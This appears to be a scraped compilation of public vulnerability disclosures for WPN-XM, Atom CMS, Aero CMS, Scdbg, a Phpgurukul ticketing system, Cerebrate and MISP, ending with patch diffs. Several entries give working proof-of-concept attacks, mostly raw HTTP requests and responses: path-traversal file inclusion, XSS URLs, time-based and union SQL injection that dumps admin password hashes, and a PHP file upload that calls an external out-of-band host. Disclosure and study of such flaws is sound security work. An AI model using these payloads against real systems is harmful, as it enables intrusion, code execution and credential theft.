WPN-XM Serverstack for Windows version 0.8.6 suffers from cross site scripting, local file inclusion, and path traversal vulnerabilities.

# Exploit Title: WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities  
# Discovery by: Rafael Pedrero  
# Discovery Date: 2022-02-13  
# Vendor Homepage: http://wpn-xm.org/  
# Software Link : https://github.com/WPN-XM/WPN-XM/  
# Tested Version: 0.8.6  
# Tested on:  Windows 10 using XAMPP

# Vulnerability Type: Local File Inclusion (LFI) & directory traversal  
(path traversal)

CVSS v3: 7.5  
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  
CWE: CWE-829, CWE-22

    Vulnerability description: WPN-XM Serverstack for Windows v0.8.6 allows  
unauthenticated directory traversal and Local File Inclusion through the  
parameter in an /tools/webinterface/index.php?page=..\..\..\..\..\..\hello  
(without php) GET request.

Proof of concept:

To detect: http://localhost/tools/webinterface/index.php?page=)

The parameter "page" can be modified and load a php file in the server.

Example, In C:\:hello.php with this content:

C:\>type hello.php  
<?php  
echo "HELLO FROM C:\\hello.php";  
?>

To Get hello.php in c:\ :  
http://localhost/tools/webinterface/index.php?page=..\..\..\..\..\..\hello

Note: hello without ".php".

And you can see the PHP message into the browser at the start.

Response:

HELLO FROM C:\hello.php<!DOCTYPE html>  
<html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">  
<head>  
    <meta charset="utf-8" />  
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />  
    <meta http-equiv="X-UA-Compatible" content="IE=edge">  
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <title>WP?-XM Server Stack for Windows - 0.8.6</title>  
    <meta name="description" content="WP?-XM Server Stack for Windows -  
Webinterface.">  
    <meta name="author" content="Jens-André Koch" />  
    <link rel="shortcut icon" href="favicon.ico" />

# Vulnerability Type: reflected Cross-Site Scripting (XSS)

CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N  
CWE: CWE-79

Vulnerability description: WPN-XM Serverstack for Windows v0.8.6, does not  
sufficiently encode user-controlled inputs, resulting in a reflected  
Cross-Site Scripting (XSS) vulnerability via the  
/tools/webinterface/index.php, in multiple parameters.

Proof of concept:

http://localhost/tools/webinterface/index.php?action=showtab%3Cscript%3Ealert(1);%3C/script%3E&page=config&tab=help  
http://localhost/tools/webinterface/index.php?action=showtab&page=config%3Cscript%3Ealert(1);%3C/script%3E&tab=help  
http://localhost/tools/webinterface/index.php?action=showtab&page=config&tab=help%3Cscript%3Ealert(1);%3C/script%3E

WPN-XM Serverstack For Windows 0.8.6 XSS / LFI / Traversal

Atom CMS version 2.0 suffers from a remote SQL injection vulnerability. Original discovery of this issue in this version is attributed to Luca Cuzzolin in February of 2022.

    # Exploit Title: Atom CMS v2.0 - SQL Injection (no auth)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://github.com/thedigicraft/Atom.CMS# Software Link: https://github.com/thedigicraft/Atom.CMS# Version: 2.0# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example-----------------------------------------------------------------------------------------------------------------------Param: id-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /Atom.CMS-master/admin/index.php?page=users&id=(select*from(select(sleep(10)))a) HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 93Origin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/Atom.CMS-master/admin/index.php?page=users&id=1Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1first=Alan2n&last=Quandt&email=alan%40alan.com&status=1&password=&passwordv=&submitted=1&id=1--------------------------------------------------------------------------------------------------------------------- --Response wait 10 sec-----------------------------------------------------------------------------------------------------------------------Other URL and params-----------------------------------------------------------------------------------------------------------------------/Atom.CMS-master/admin/index.php [email]/Atom.CMS-master/admin/index.php [id]/Atom.CMS-master/admin/index.php [slug]/Atom.CMS-master/admin/index.php [status]/Atom.CMS-master/admin/index.php [user]

Atom CMS 2.0 SQL Injection

Aero CMS version 0.l0.1 remote shell upload exploit. Original discovery of this issue in this version is attributed to D4rkP0w4r in April of 2022.

# Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth)  
# Date: 15/10/2022  
# Exploit Author: Hubert Wojciechowski  
# Contact Author: hub.woj12345@gmail.com  
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS  
# Software Link: https://github.com/MegaTKC/AeroCMS  
# Version: 0.0.1  
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Example   
-----------------------------------------------------------------------------------------------------------------------  
Param: image content uploading image  
-----------------------------------------------------------------------------------------------------------------------  
Req  
-----------------------------------------------------------------------------------------------------------------------

POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116  
Content-Length: 1156  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post  
Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1

-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_title"

mmmmmmmmmmmmmmmmm  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_category_id"

1  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_user"

admin  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_status"

draft  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="image"; filename="at8vapghhb.php"  
Content-Type: text/plain

<?php printf("bh3gr8e32s".(7*6)."ci4hs9f43t");gethostbyname("48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com");?>  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_tags"

-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_content"

<p>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm</p>  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="create_post"

Publish Post  
-----------------------------369779619541997471051134453116--

-----------------------------------------------------------------------------------------------------------------------  
Res:  
-----------------------------------------------------------------------------------------------------------------------

The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com.

Aero CMS 0.0.1 Remote Shell Upload

Aero CMS version 0.0.1 suffers from multiple remote SQL injection vulnerabilities. Original discovery of this issue in this version is attributed to nu11secur1ty in August of 2022.

    # Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://github.com/MegaTKC/AeroCMS# Software Link: https://github.com/MegaTKC/AeroCMS# Version: 0.0.1# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example SQL Injection-----------------------------------------------------------------------------------------------------------------------Param: search-----------------------------------------------------------------------------------------------------------------------Req sql ini detect-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 21search=245692'&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 03:07:06 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheContent-Length: 3466Connection: closeContent-Type: text/html; charset=UTF-8[...]Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 21search=245692''&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 03:07:10 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 94216[...]-----------------------------------------------------------------------------------------------------------------------Req exploiting sql ini get data admin-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 113search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 05:40:05 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 101144[...]                    <a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a>[...]-----------------------------------------------------------------------------------------------------------------------Other URL and params-----------------------------------------------------------------------------------------------------------------------/AeroCMS-master/admin/posts.php [post_title]/AeroCMS-master/admin/posts.php [filename]/AeroCMS-master/admin/profile.php [filename]/AeroCMS-master/author_posts.php [author]/AeroCMS-master/category.php [category]/AeroCMS-master/post.php [p_id]/AeroCMS-master/search.php [search]/AeroCMS-master/admin/categories.php [cat_title]/AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]/AeroCMS-master/admin/posts.php [post_content]/AeroCMS-master/admin/posts.php [p_id]/AeroCMS-master/admin/posts.php [post_category_id]/AeroCMS-master/admin/posts.php [post_title]/AeroCMS-master/admin/posts.php [reset]

Aero CMS 0.0.1 SQL Injection

Scdbg version 1.0 suffers from a buffer overflow vulnerability that can cause a denial of service condition.

    # Exploit Title: Scdbg 1.0 - Buffer overflow DoS# Discovery by: Rafael Pedrero# Discovery Date: 2021-06-13# Vendor Homepage:  http://sandsprite.com/blogs/index.php?uid=7&pid=152# Software Link : https://github.com/dzzie/VS_LIBEMU# Tested Version: 1.0 - Compile date: Jun  3 2021 20:57:45# Tested on:  Windows 7, 10CVSS v3: 7.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:HCWE: CWE-400Vulnerability description: scdbg.exe (all versions) is affected by a Denialof Service vulnerability that occurs when you use the /foff parameter ornot with a specific shellcode causing it to shutdown. Any malware could usethis option to evade the scan.Proof of concept:Save this script like scdbg_crash.py and execute it: scdbg.exe -foff 1 -fscdbg_crash.bin / scdbg.exe -f scdbg_crash.bin#!/usr/bin/env pythoncrash = "\x90\xF6\x84\x01\x90\x90\x90\x90"f = open ("scdbg_crash.bin", "w")f.write(crash)f.close()You can use gui_launcher.exe and check "Start offset 0x": 1 or directlywithout check[image: image.png]

Scdbg 1.0 Denial Of Service

Phpgurukul Park Ticketing Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via the Admin Name parameter.

_\# Exploit Title: PARK TICKETING MANAGEMENT SYSTEM — Stored XSS Vulnreability.  
\# Date: 25–01–2023  
\# Exploit Author: Venkata Siva Kumar Medituru  
\# Vendor Homepage:_ _https://phpgurukul.com/__\# Software Link:_ _https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/__\# Vulnerable Parameter : Admin Name  
\# Version: 1.0  
\# Tested on: Windows 10  
\# Contact:_ _https://www.linkedin.com/in/shivakumar-m-v/_

XSS is an attack technique that injects malicious code into vulnerable web applications. Unlike other attacks, this technique does not target the web server itself, but the user’s browser.

Stored XSS is a type of XSS that stores malicious code on the application server. Using stored XSS is only possible if your application is designed to store user input.

The Reproducive Steps are given in Video PoC.

Remediation :

01) Use Web Application Firewall.

02) Input validation.

CVE-2023-26958: Stored XSS — PARK TICKETING MANAGEMENT SYSTEM(Phpgurukul)

Phpgurukul Park Ticketing Management System 1.0 is vulnerable to SQL Injection via the User Name parameter.

> \# Exploit Title: PARK TICKETING MANAGEMENT SYSTEM — SQL Injection Vulnreability.  
> \# Date: 25–01–2023  
> \# Exploit Author: Venkata Siva Kumar Medituru  
> \# Vendor Homepage: https://phpgurukul.com/  
> \# Software Link: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/  
> \# Vulnerable Parameter : User Name  
> \# Version: 1.0  
> \# Tested on: Windows 10  
> \# Contact: https://www.linkedin.com/in/shivakumar-m-v/

SQL injection is a technique used to exploit the Authentication pages and intruder can penetrate into dashboard without any valid credentials. The perpetrator may enumerate User name, personal information, App functionality and in other words complete account take over is possible.

The reproducive steps are given in vidoe PoC.

> **Mitigations**

01) Configure Web Application Firewall to understand various SQL payloads and to ignore / drop the malicious requests crafted by perpetrator

02) Implement input validations and parametrized queries including prepared statements.

03) Limit the verbose error messages in the responses so that attacker not able to figure out the way to bypass the implemented controls.

CVE-2023-26959: Authentication Bypass — PARK TICKETING MANAGEMENT SYSTEM(Phpgurukul)

db_convert.php in ScriptCase through 9.9.008 is vulnerable to Arbitrary File Deletion by an admin via a directory traversal sequence in the file parameter.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2022-32199: GitHub - Toxich4/CVE-2022-32199

In Cerebrate 1.13, a blind SQL injection exists in the searchAll API endpoint.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   Notifications
*   Fork 14

*   Code
*   Issues 60
*   Pull requests 2
*   Actions
*   Projects 3
*   Wiki
*   Security
*   Insights

Permalink

Browse files

fix: \[security\] blind SQL injection in searchAll

\- As reported by Zigrin Security

*   Loading branch information

Showing **2 changed files** with **2 additions** and **1 deletion**.

*   *   *   InstanceController.php
    *   *   InstanceTable.php

@@ -38,6 +38,7 @@ public function searchAll()

$searchValue = $this\->request\->getQuery('search');

$model = $this\->request\->getQuery('model', null);

$limit = $this\->request\->getQuery('limit', 5);

$limit = is\_numeric($limit) ? $limit : 5;

if (!empty($this\->request\->getQuery('show\_all', false))) {

$limit = null;

}

@@ -81,7 +81,7 @@ public function getStatistics(int $days=30): array

return $statistics;

}

  

public function searchAll($value, $user, $limit\=5, $model\=null)

public function searchAll($value, $user, int $limit\=5, $model\=null)

{

$results = \[\];

$models = $this\->seachAllTables;

**0 comments on commit 5f1c99c**

Please sign in to comment.

CVE-2023-28883: fix: [security] blind SQL injection in searchAll · cerebrate-project/cerebrate@5f1c99c

In MISP 2.4.169, app/Lib/Tools/CustomPaginationTool.php allows XSS in the community index.

Permalink

Browse files

fix: \[security\] XSS in community index

\- As reported by Zigrin Security

*   Loading branch information

Showing **1 changed file** with **2 additions** and **0 deletions**.

@@ -27,6 +27,8 @@ public function createPaginationRules($items, $options, $model, $sort = 'id', $f

$params\['options'\]\[$v\] = $options\[$v\];

}

}

$params\['page'\] = is\_numeric($params\['page'\]) ? $params\['page'\] : 1;

$params\['limit'\] = is\_numeric($params\['limit'\]) ? $params\['limit'\] : 60;

$maxPage = floor($params\['count'\] / $params\['limit'\]);

if ($params\['count'\] % $params\['limit'\] != 0) {

$maxPage += 1;

**0 comments on commit b94c797**

Please sign in to comment.

Tag

#php